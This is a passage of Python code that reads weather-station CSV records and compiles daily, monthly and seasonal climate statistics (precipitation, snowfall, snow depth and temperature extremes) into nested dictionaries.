int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_max"][1] = [] clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_min"][1] = [] clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) with open(filename,newline="") as f: print("--- COMPILING DICTIONARIES ---") csvfile = csv.reader(f, delimiter=',') for each in csvfile: if each[0] in ["STATION",'"STATION"']: pass else: if each[0] not in station_ids: station_ids.append(each[0]) if "station" not in clmt: if "city" in CITY: clmt["station_name"] = CITY["city"] else: clmt["station_name"] = each[1] clmt["station"] = each[0] print("--- City: {} ---".format(clmt["station_name"])) clmt["coordinates"] = "{}, {}".format(each[2],each[3]) clmt["elevation"] = each[4] if "station" not in metclmt: if "city" in CITY: metclmt["station_name"] = CITY["city"] else: metclmt["station_name"] = each[1] metclmt["station"] = each[0] metclmt["coordinates"] = "{}, {}".format(each[2],each[3]) metclmt["elevation"] = each[4] #if y % 10 == 0: print("{},".format(each[5][0:4]),end=" ") y = int(each[5][0:4]) m = int(each[5][5:7]) d = int(each[5][8:10]) if y not in clmt: clmt[y] = {} # YEAR if m not in clmt[y]: clmt[y][m] = {} # MONTH # DAY Record stuff if d in clmt[y][m]: # This will replace the existing 
DayRecord if the entire entry was blank if all(v == "" for v in [clmt[y][m][d].prcp,clmt[y][m][d].snow,clmt[y][m][d].snwd,clmt[y][m][d].tmax,clmt[y][m][d].tmin]): clmt[y][m][d].stationid = each[0] clmt[y][m][d].station_name = each[1] clmt[y][m][d].station_lat = each[2] clmt[y][m][d].station_lon = each[3] clmt[y][m][d].station_elev = each[4] clmt[y][m][d].prcp = each[6] flags_prcp = each[7].split(",") clmt[y][m][d].prcpM, clmt[y][m][d].prcpQ, clmt[y][m][d].prcpS, clmt[y][m][d].prcpT = attchk(flags_prcp) if clmt[y][m][d].prcp not in ["","-9999","9999"] and clmt[y][m][d].prcpQ in ignoreflags: if float(clmt[y][m][d].prcp) > 0: clmt[y]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > clmt[y]["prcpPROP"]["day_max"][0]: clmt[y]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y]["prcpPROP"]["day_max"][1] = [] clmt[y]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["prcp"].append(float(clmt[y][m][d].prcp)) if round(float(clmt[y][m][d].prcp),2) == clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].prcp),2) > clmt[y][m]["prcpPROP"]["day_max"][0]: clmt[y][m]["prcpPROP"]["day_max"][0] = round(float(clmt[y][m][d].prcp),2) clmt[y][m]["prcpPROP"]["day_max"][1] = [] clmt[y][m]["prcpPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": clmt[y]["prcpDAYS"] += 1 clmt[y][m]["prcpDAYS"] += 1 clmt[y][m][d].snow = each[8] flags_snow = each[9].split(",") clmt[y][m][d].snowM, clmt[y][m][d].snowQ, clmt[y][m][d].snowS, clmt[y][m][d].snowT = attchk(flags_snow) if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: if float(clmt[y][m][d].snow) > 0: clmt[y]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == 
clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y]["snowPROP"]["day_max"][0]: clmt[y]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y]["snowPROP"]["day_max"][1] = [] clmt[y]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snow"].append(float(clmt[y][m][d].snow)) if round(float(clmt[y][m][d].snow),1) == clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snow),1) > clmt[y][m]["snowPROP"]["day_max"][0]: clmt[y][m]["snowPROP"]["day_max"][0] = round(float(clmt[y][m][d].snow),1) clmt[y][m]["snowPROP"]["day_max"][1] = [] clmt[y][m]["snowPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": clmt[y]["snowDAYS"] += 1 clmt[y][m]["snowDAYS"] += 1 clmt[y][m][d].snwd = each[10] flags_snwd = each[11].split(",") clmt[y][m][d].snwdM, clmt[y][m][d].snwdQ, clmt[y][m][d].snwdS, clmt[y][m][d].snwdT = attchk(flags_snwd) if clmt[y][m][d].snwdQ in ignoreflags and clmt[y][m][d].snwd not in ["9999","-9999",""]: if float(clmt[y][m][d].snwd) > 0: clmt[y]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y]["snwdPROP"]["day_max"][0]: clmt[y]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y]["snwdPROP"]["day_max"][1] = [] clmt[y]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) clmt[y][m]["snwd"].append(float(clmt[y][m][d].snwd)) if round(float(clmt[y][m][d].snwd),1) == clmt[y][m]["snwdPROP"]["day_max"][0]: clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) elif round(float(clmt[y][m][d].snwd),1) > clmt[y][m]["snwdPROP"]["day_max"][0]: clmt[y][m]["snwdPROP"]["day_max"][0] = round(float(clmt[y][m][d].snwd),1) clmt[y][m]["snwdPROP"]["day_max"][1] = [] 
clmt[y][m]["snwdPROP"]["day_max"][1].append(clmt[y][m][d]) if float(clmt[y][m][d].snwd) > 0 or clmt[y][m][d].snwdM == "T": clmt[y]["snwdDAYS"] += 1 clmt[y][m]["snwdDAYS"] += 1 clmt[y][m][d].tmax = each[12] flags_tmax = each[13].split(",") clmt[y][m][d].tmaxM, clmt[y][m][d].tmaxQ, clmt[y][m][d].tmaxS, clmt[y][m][d].tmaxT = attchk(flags_tmax) clmt[y][m][d].tmin = each[14] flags_tmin = each[15].split(",") clmt[y][m][d].tminM, clmt[y][m][d].tminQ, clmt[y][m][d].tminS, clmt[y][m][d].tminT = attchk(flags_tmin) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: if (clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin)) or clmt[y][m][d].tmin == "": clmt[y]["tmax"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tmax"].append(int(clmt[y][m][d].tmax)) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y]["tmaxPROP"]["day_max"][0]: clmt[y]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_max"][1] = [] clmt[y]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) < clmt[y]["tmaxPROP"]["day_min"][0]: clmt[y]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y]["tmaxPROP"]["day_min"][1] = [] clmt[y]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmax) > clmt[y][m]["tmaxPROP"]["day_max"][0]: clmt[y][m]["tmaxPROP"]["day_max"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_max"][1] = [] clmt[y][m]["tmaxPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmax) == clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) elif 
int(clmt[y][m][d].tmax) < clmt[y][m]["tmaxPROP"]["day_min"][0]: clmt[y][m]["tmaxPROP"]["day_min"][0] = int(clmt[y][m][d].tmax) clmt[y][m]["tmaxPROP"]["day_min"][1] = [] clmt[y][m]["tmaxPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: if (clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax)) or clmt[y][m][d].tmax == "": clmt[y]["tmin"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tmin"].append(int(clmt[y][m][d].tmin)) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y]["tminPROP"]["day_max"][0]: clmt[y]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_max"][1] = [] clmt[y]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y]["tminPROP"]["day_min"][0]: clmt[y]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y]["tminPROP"]["day_min"][1] = [] clmt[y]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) > clmt[y][m]["tminPROP"]["day_max"][0]: clmt[y][m]["tminPROP"]["day_max"][0] = int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_max"][1] = [] clmt[y][m]["tminPROP"]["day_max"][1].append(clmt[y][m][d]) if int(clmt[y][m][d].tmin) == clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) elif int(clmt[y][m][d].tmin) < clmt[y][m]["tminPROP"]["day_min"][0]: clmt[y][m]["tminPROP"]["day_min"][0] = int(clmt[y][m][d].tmin) clmt[y][m]["tminPROP"]["day_min"][1] = [] clmt[y][m]["tminPROP"]["day_min"][1].append(clmt[y][m][d]) if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not 
in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) clmt[y][m]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) else: clmt[y][m][d] = DayRecord(each) statbuild(y,m,d) # MONTHLY STATS for y in [YR for YR in clmt if type(YR) == int]: for m in [MO for MO in clmt[y] if type(MO) == int]: # PRCP if round(sum(clmt[y][m]["prcp"]),2) not in clmt_vars_months["prcp"]: clmt_vars_months["prcp"][round(sum(clmt[y][m]["prcp"]),2)] = [datetime.date(y,m,1)] else: clmt_vars_months["prcp"][round(sum(clmt[y][m]["prcp"]),2)].append(datetime.date(y,m,1)) if clmt[y][m]["prcpDAYS"] not in clmt_vars_months["prcpDAYS"]: clmt_vars_months["prcpDAYS"][clmt[y][m]["prcpDAYS"]] = [datetime.date(y,m,1)] else: clmt_vars_months["prcpDAYS"][clmt[y][m]["prcpDAYS"]].append(datetime.date(y,m,1)) try: if round(sum(clmt[y][m]["prcp"]),2) == clmt[y]["prcpPROP"]["month_max"][0]: clmt[y]["prcpPROP"]["month_max"][1].append(m) elif round(sum(clmt[y][m]["prcp"]),2) > clmt[y]["prcpPROP"]["month_max"][0]: clmt[y]["prcpPROP"]["month_max"][0] = round(sum(clmt[y][m]["prcp"]),2) clmt[y]["prcpPROP"]["month_max"][1] = [] clmt[y]["prcpPROP"]["month_max"][1].append(m) if round(sum(clmt[y][m]["prcp"]),2) == clmt[y]["prcpPROP"]["month_min"][0]: clmt[y]["prcpPROP"]["month_min"][1].append(m) elif round(sum(clmt[y][m]["prcp"]),2) < clmt[y]["prcpPROP"]["month_min"][0]: clmt[y]["prcpPROP"]["month_min"][0] = round(sum(clmt[y][m]["prcp"]),2) clmt[y]["prcpPROP"]["month_min"][1] = [] clmt[y]["prcpPROP"]["month_min"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous PRCP data - {}-{}".format(y,str(m).zfill(2))) # SNOW if round(sum(clmt[y][m]["snow"]),1) not in clmt_vars_months["snow"]: 
clmt_vars_months["snow"][round(sum(clmt[y][m]["snow"]),1)] = [datetime.date(y,m,1)] else: clmt_vars_months["snow"][round(sum(clmt[y][m]["snow"]),1)].append(datetime.date(y,m,1)) if clmt[y][m]["snowDAYS"] not in clmt_vars_months["snowDAYS"]: clmt_vars_months["snowDAYS"][clmt[y][m]["snowDAYS"]] = [datetime.date(y,m,1)] else: clmt_vars_months["snowDAYS"][clmt[y][m]["snowDAYS"]].append(datetime.date(y,m,1)) #if sum(clmt[y][m]["snwd"]) not in clmt_vars_months["snwd"]: clmt_vars_months["snwd"][sum(clmt[y][m]["snwd"])] = [datetime.date(y,m,1)] #else: clmt_vars_months["snwd"][sum(clmt[y][m]["snwd"])].append(datetime.date(y,m,1)) try: if round(sum(clmt[y][m]["snow"]),1) == clmt[y]["snowPROP"]["month_max"][0]: clmt[y]["snowPROP"]["month_max"][1].append(m) elif round(sum(clmt[y][m]["snow"]),1) > clmt[y]["snowPROP"]["month_max"][0]: clmt[y]["snowPROP"]["month_max"][0] = round(sum(clmt[y][m]["snow"]),1) clmt[y]["snowPROP"]["month_max"][1] = [] clmt[y]["snowPROP"]["month_max"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous SNOW data - {}-{}".format(y,str(m).zfill(2))) # SNWD if clmt[y][m]["snwdDAYS"] not in clmt_vars_months["snwdDAYS"]: clmt_vars_months["snwdDAYS"][clmt[y][m]["snwdDAYS"]] = [datetime.date(y,m,1)] else: clmt_vars_months["snwdDAYS"][clmt[y][m]["snwdDAYS"]].append(datetime.date(y,m,1)) # TMAX if len(clmt[y][m]["tmax"]) > excludemonth: if round(mean(clmt[y][m]["tmax"]),1) not in clmt_vars_months["tmax"]: clmt_vars_months["tmax"][round(mean(clmt[y][m]["tmax"]),1)] = [datetime.date(y,m,1)] else: clmt_vars_months["tmax"][round(mean(clmt[y][m]["tmax"]),1)].append(datetime.date(y,m,1)) try: if round(mean(clmt[y][m]["tmax"]),1) == clmt[y]["tmaxPROP"]["month_AVG_max"][0]: clmt[y]["tmaxPROP"]["month_AVG_max"][1].append(m) elif round(mean(clmt[y][m]["tmax"]),1) > clmt[y]["tmaxPROP"]["month_AVG_max"][0]: clmt[y]["tmaxPROP"]["month_AVG_max"][0] = round(mean(clmt[y][m]["tmax"]),1) clmt[y]["tmaxPROP"]["month_AVG_max"][1] = [] 
clmt[y]["tmaxPROP"]["month_AVG_max"][1].append(m) if round(mean(clmt[y][m]["tmax"]),1) == clmt[y]["tmaxPROP"]["month_AVG_min"][0]: clmt[y]["tmaxPROP"]["month_AVG_min"][1].append(m) elif round(mean(clmt[y][m]["tmax"]),1) < clmt[y]["tmaxPROP"]["month_AVG_min"][0]: clmt[y]["tmaxPROP"]["month_AVG_min"][0] = round(mean(clmt[y][m]["tmax"]),1) clmt[y]["tmaxPROP"]["month_AVG_min"][1] = [] clmt[y]["tmaxPROP"]["month_AVG_min"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous TMAX data - {}-{}".format(y,str(m).zfill(2))) # TMIN if len(clmt[y][m]["tmin"]) > excludemonth: if round(mean(clmt[y][m]["tmin"]),1) not in clmt_vars_months["tmin"]: clmt_vars_months["tmin"][round(mean(clmt[y][m]["tmin"]),1)] = [datetime.date(y,m,1)] else: clmt_vars_months["tmin"][round(mean(clmt[y][m]["tmin"]),1)].append(datetime.date(y,m,1)) try: if round(mean(clmt[y][m]["tmin"]),1) == clmt[y]["tminPROP"]["month_AVG_max"][0]: clmt[y]["tminPROP"]["month_AVG_max"][1].append(m) elif round(mean(clmt[y][m]["tmin"]),1) > clmt[y]["tminPROP"]["month_AVG_max"][0]: clmt[y]["tminPROP"]["month_AVG_max"][0] = round(mean(clmt[y][m]["tmin"]),1) clmt[y]["tminPROP"]["month_AVG_max"][1] = [] clmt[y]["tminPROP"]["month_AVG_max"][1].append(m) if round(mean(clmt[y][m]["tmin"]),1) == clmt[y]["tminPROP"]["month_AVG_min"][0]: clmt[y]["tminPROP"]["month_AVG_min"][1].append(m) elif round(mean(clmt[y][m]["tmin"]),1) < clmt[y]["tminPROP"]["month_AVG_min"][0]: clmt[y]["tminPROP"]["month_AVG_min"][0] = round(mean(clmt[y][m]["tmin"]),1) clmt[y]["tminPROP"]["month_AVG_min"][1] = [] clmt[y]["tminPROP"]["month_AVG_min"][1].append(m) except: print("*** SKIPPED: Insufficient or erroneous TMIN data - {}-{}".format(y,str(m).zfill(2))) if len(clmt[y][m]["tempAVGlist"]) > excludemonth * 2: if round(mean(clmt[y][m]["tempAVGlist"]),1) not in clmt_vars_months["tavg"]: clmt_vars_months["tavg"][round(mean(clmt[y][m]["tempAVGlist"]),1)] = [datetime.date(y,m,1)] else: 
clmt_vars_months["tavg"][round(mean(clmt[y][m]["tempAVGlist"]),1)].append(datetime.date(y,m,1)) for YYYY in sorted([Y for Y in clmt if type(Y) == int]): # THIS IS THE CURRENT PROBLEM...NOT READING IN JAN/FEB DATA? if YYYY not in metclmt and any(MONTH >= 3 for MONTH in clmt[YYYY] if type(MONTH) == int): metclmt[YYYY] = {} for MM in sorted([M for M in clmt[YYYY] if type(M) == int]): if MM <= 2: if YYYY-1 in metclmt: metclmt[YYYY-1][MM] = clmt[YYYY][MM] else: metclmt[YYYY][MM] = clmt[YYYY][MM] for YYYY in [YEAR for YEAR in metclmt if type(YEAR) == int]: for s in ["spring","summer","fall","winter"]: metclmt[YYYY][s] = {} if s == "spring": metclmt[YYYY][s]["valid"] = [3,4,5] elif s == "summer": metclmt[YYYY][s]["valid"] = [6,7,8] elif s == "fall": metclmt[YYYY][s]["valid"] = [9,10,11] elif s == "winter": metclmt[YYYY][s]["valid"] = [12,1,2] else: return print("SEASON ERROR! Programmer! Check the seasons!") for y in [Y for Y in metclmt if type(Y) == int]: # PRCP metclmt[y]["recordqty"] = sum(metclmt[y][m]["recordqty"] for m in metclmt[y] if type(m) == int) #input("year = {}; recordqty = {}".format(y,metclmt[y]["recordqty"])) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["recordqty"] = sum(metclmt[y][m]["recordqty"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) metclmt[y]["prcp"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcp"] = [] metclmt[y]["prcp"].extend(r for m in metclmt[y].keys() if type(m) == int for r in metclmt[y][m]["prcp"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcp"].extend(r for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for r in metclmt[y][m]["prcp"]) metclmt[y]["prcpDAYS"] = sum(metclmt[y][m]["prcpDAYS"] for m in metclmt[y] if type(m) == int) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpDAYS"] = sum(metclmt[y][m]["prcpDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) metclmt[y]["prcpPROP"] = 
{"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} if len(metclmt[y]["prcp"]) > 0: metclmt[y]["prcpPROP"]["day_max"][0] = round(max(metclmt[y]["prcp"]),2) for s in ["spring","summer","fall","winter"]: if len(metclmt[y][s]["prcp"]) > 0: metclmt[y][s]["prcpPROP"]["day_max"][0] = round(max(metclmt[y][s]["prcp"]),2) metclmt[y]["prcpPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].prcpQ in ignoreflags and metclmt[y][m][d].prcp not in ["","-9999","9999"] and round(float(metclmt[y][m][d].prcp),2) == metclmt[y]["prcpPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].prcpQ in ignoreflags and metclmt[y][m][d].prcp not in ["","-9999","9999"] and round(float(metclmt[y][m][d].prcp),2) == metclmt[y][s]["prcpPROP"]["day_max"][0]) #if y >= 2019: print(y,calendar.month_abbr[m]) metclmt[y]["prcpPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int),2) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["prcpPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),2) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["prcpPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["prcp"]),2) == metclmt[y]["prcpPROP"]["month_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["prcp"]),2) == 
metclmt[y][s]["prcpPROP"]["month_max"][0]) metclmt[y]["prcpPROP"]["month_min"][0] = round(min(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int),2) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["prcpPROP"]["month_min"][0] = round(min(sum(metclmt[y][m]["prcp"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),2) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["prcpPROP"]["month_min"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["prcp"]),2) == metclmt[y]["prcpPROP"]["month_min"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["prcpPROP"]["month_min"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["prcp"]),2) == metclmt[y][s]["prcpPROP"]["month_min"][0]) # SNOW metclmt[y]["snow"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snow"] = [] metclmt[y]["snow"].extend(r for m in metclmt[y].keys() if type(m) == int for r in metclmt[y][m]["snow"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snow"].extend(r for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for r in metclmt[y][m]["snow"]) metclmt[y]["snowDAYS"] = sum(metclmt[y][m]["snowDAYS"] for m in metclmt[y] if type(m) == int) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowDAYS"] = sum(metclmt[y][m]["snowDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) metclmt[y]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} if len(metclmt[y]["snow"]) > 0: metclmt[y]["snowPROP"]["day_max"][0] = round(max(metclmt[y]["snow"]),1) for s in ["spring","summer","fall","winter"]: if len(metclmt[y][s]["snow"]) > 0: metclmt[y][s]["snowPROP"]["day_max"][0] = round(max(metclmt[y][s]["snow"]),1) 
metclmt[y]["snowPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snowQ in ignoreflags and metclmt[y][m][d].snow not in ["","-9999","9999"] and round(float(metclmt[y][m][d].snow),1) == metclmt[y]["snowPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snowQ in ignoreflags and metclmt[y][m][d].snow not in ["","-9999","9999"] and round(float(metclmt[y][m][d].snow),1) == metclmt[y][s]["snowPROP"]["day_max"][0]) metclmt[y]["snowPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snow"]) for m in metclmt[y] if type(m) == int),1) for s in ["spring","summer","fall","winter"]: try: metclmt[y][s]["snowPROP"]["month_max"][0] = round(max(sum(metclmt[y][m]["snow"]) for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]),1) except: pass #print(y,s,m,[M for M in metclmt[y] if type(M) == int]) metclmt[y]["snowPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and round(sum(metclmt[y][m]["snow"]),1) == metclmt[y]["snowPROP"]["month_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snowPROP"]["month_max"][1].extend(m for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] and round(sum(metclmt[y][m]["snow"]),1) == metclmt[y][s]["snowPROP"]["month_max"][0]) # SNWD metclmt[y]["snwd"] = [] for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwd"] = [] metclmt[y]["snwd"].extend(r for m in metclmt[y].keys() if type(m) == int for r in metclmt[y][m]["snwd"]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwd"].extend(r for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for r in metclmt[y][m]["snwd"]) metclmt[y]["snwdDAYS"] = 
sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdDAYS"] = sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) #metclmt[y]["snwdDAYS"] = sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int) #for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdDAYS"] = sum(metclmt[y][m]["snwdDAYS"] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"]) #metclmt[y]["snwdPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} metclmt[y]["snwdPROP"] = {"day_max":[-1,[]]} #for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"] = {"day_max":[-1,[]]} if len(metclmt[y]["snwd"]) > 0: metclmt[y]["snwdPROP"]["day_max"][0] = round(max(metclmt[y]["snwd"]),1) for s in ["spring","summer","fall","winter"]: if len(metclmt[y][s]["snwd"]) > 0: metclmt[y][s]["snwdPROP"]["day_max"][0] = round(max(metclmt[y][s]["snwd"]),1) metclmt[y]["snwdPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snwdQ in ignoreflags and metclmt[y][m][d].snwd not in ["","-9999","9999"] and round(float(metclmt[y][m][d].snwd),1) == metclmt[y]["snwdPROP"]["day_max"][0]) for s in ["spring","summer","fall","winter"]: metclmt[y][s]["snwdPROP"]["day_max"][1].extend(metclmt[y][m][d] for m in metclmt[y] if type(m) == int and m in metclmt[y][s]["valid"] for d in metclmt[y][m] if type(d) == int and metclmt[y][m][d].snwdQ in ignoreflags and metclmt[y][m][d].snwd not in ["","-9999","9999"] and 